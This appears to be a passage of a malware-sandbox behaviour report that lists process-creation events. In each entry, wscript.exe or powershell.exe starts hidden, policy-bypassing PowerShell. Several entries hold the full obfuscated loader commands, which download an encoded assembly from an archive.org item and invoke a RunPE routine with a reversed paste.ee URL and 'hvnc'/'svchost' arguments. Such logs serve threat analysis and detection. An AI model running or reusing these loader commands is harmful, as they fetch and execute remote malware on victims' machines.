Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
